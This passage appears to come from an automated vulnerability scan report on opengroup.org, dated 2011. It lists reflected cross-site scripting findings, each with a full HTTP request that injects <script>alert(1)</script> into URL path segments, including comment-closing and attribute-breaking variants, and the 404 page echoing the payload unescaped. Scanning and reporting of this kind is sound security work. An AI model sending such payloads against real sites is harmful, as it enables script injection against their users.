<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc/arch9a39f<script>alert(1)</script>f8f8cdf717/toc2.html<br>
...[SNIP]...

3.147. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architecture/togaf8-doc/archc8177--><script>alert(1)</script>3a4b97807fc/toc2.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:09 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5249

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-doc/archc8177--><script>alert(1)</script>3a4b97807fc/toc2.html -->
...[SNIP]...

3.148. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Request

GET /architecture/togaf8-doc/arch7288b"><script>alert(1)</script>23296fabe27/toc2.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:05 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5246

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture/togaf8-doc/arch7288b"><script>alert(1)</script>23296fabe27/toc2.html">
...[SNIP]...

3.149. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Request

GET /architecture/togaf8-doc/arch/toc2.html3d10a"><script>alert(1)</script>69f209beaf5 HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:17 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5246

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture/togaf8-doc/arch/toc2.html3d10a"><script>alert(1)</script>69f209beaf5">
...[SNIP]...

3.150. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architecture/togaf8-doc/arch/toc2.html45f60--><script>alert(1)</script>50e39303b85 HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:22 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5249

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-doc/arch/toc2.html45f60--><script>alert(1)</script>50e39303b85 -->
...[SNIP]...

3.151. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Request

GET /architecture/togaf8-doc/arch/toc2.htmlc201c<script>alert(1)</script>1e4c0cf0ddd HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:19 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5240

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.htmlc201c<script>alert(1)</script>1e4c0cf0ddd<br>
...[SNIP]...

3.152. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architecture7c3a5--><script>alert(1)</script>63e2aa5d122/togaf8-doc/arch/welcome.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:04 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5258

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture7c3a5--><script>alert(1)</script>63e2aa5d122/togaf8-doc/arch/welcome.html -->
...[SNIP]...

3.153. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Request

GET /architecture8a706<script>alert(1)</script>4139a5bd8a2/togaf8-doc/arch/welcome.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:01 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5249

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture8a706<script>alert(1)</script>4139a5bd8a2/togaf8-doc/arch/welcome.html<br>
...[SNIP]...

3.154. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Request

GET /architecture1879c"><script>alert(1)</script>f5899df6f60/togaf8-doc/arch/welcome.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:59 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5255

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture1879c"><script>alert(1)</script>f5899df6f60/togaf8-doc/arch/welcome.html">
...[SNIP]...

3.155. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Request

GET /architecture/togaf8-doc9ae1c<script>alert(1)</script>3bd409f1f54/arch/welcome.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:16 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5249

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc9ae1c<script>alert(1)</script>3bd409f1f54/arch/welcome.html<br>
...[SNIP]...

3.156. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architecture/togaf8-docf63af--><script>alert(1)</script>21768ec9add/arch/welcome.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:19 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5258

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-docf63af--><script>alert(1)</script>21768ec9add/arch/welcome.html -->
...[SNIP]...

3.157. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Request

GET /architecture/togaf8-doc900bf"><script>alert(1)</script>c420b677f70/arch/welcome.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:13 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5255

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture/togaf8-doc900bf"><script>alert(1)</script>c420b677f70/arch/welcome.html">
...[SNIP]...

3.158. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architecture/togaf8-doc/archf2eb2--><script>alert(1)</script>ee53edf7a8a/welcome.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:27 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5258

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-doc/archf2eb2--><script>alert(1)</script>ee53edf7a8a/welcome.html -->
...[SNIP]...

3.159. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Request

GET /architecture/togaf8-doc/archc280c"><script>alert(1)</script>38d7c8bfaea/welcome.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:24 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5255

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture/togaf8-doc/archc280c"><script>alert(1)</script>38d7c8bfaea/welcome.html">
...[SNIP]...

3.160. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Request

GET /architecture/togaf8-doc/arch527ca<script>alert(1)</script>e5d8b004316/welcome.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:25 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5249

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc/arch527ca<script>alert(1)</script>e5d8b004316/welcome.html<br>
...[SNIP]...

3.161. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Request

GET /architecture/togaf8-doc/arch/welcome.html1d70d"><script>alert(1)</script>bb423776bcc HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:32 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5255

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture/togaf8-doc/arch/welcome.html1d70d"><script>alert(1)</script>bb423776bcc">
...[SNIP]...

3.162. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architecture/togaf8-doc/arch/welcome.htmledccf--><script>alert(1)</script>e2b2ebfe22e HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:37 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5258

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-doc/arch/welcome.htmledccf--><script>alert(1)</script>e2b2ebfe22e -->
...[SNIP]...

3.163. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Request

GET /architecture/togaf8-doc/arch/welcome.html4cc01<script>alert(1)</script>f89e7409842 HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:33 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5249

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html4cc01<script>alert(1)</script>f89e7409842<br>
...[SNIP]...

3.164. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /events/sponsor-exhibit.htm

Request

GET /events78a8a<script>alert(1)</script>749c6a7fac/sponsor-exhibit.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.3.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:07 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
